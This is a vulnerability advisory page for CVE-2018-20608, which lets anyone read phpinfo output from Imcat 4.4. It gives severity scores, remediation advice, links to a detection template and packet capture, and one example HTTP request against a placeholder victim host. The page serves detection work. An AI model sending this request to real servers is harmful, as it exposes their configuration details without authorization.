🔙 목록으로 돌아가기

CVE-2018-20608: Imcat 4.4 - Phpinfo Configuration

TitleImcat 4.4 - Phpinfo Configuration
Authorritikchaddha
SeverityHigh
ImpactThe vulnerability can lead to the exposure of sensitive information, such as server configuration details.
RemediationUpdate Imcat to the latest version or apply the necessary patches to fix the Phpinfo Configuration vulnerability.
CVSS Score7.5
EPSS Score0.63562
CVE IDCVE-2018-20608
CWE IDCWE-200
Tags cve2018 cve imcat phpinfo config txjia vuln

🔍 Vulnerability Description

Imcat 4.4 allows remote attackers to read phpinfo output via the root/tools/adbug/binfo.php?phpinfo1 URI.

🌐 HTTP Request

GET /imcat/root/tools/adbug/binfo.php?phpinfo1 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-20608.yaml

🦈 Packet Capture: ⬇️ Download cve-2018-20608.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A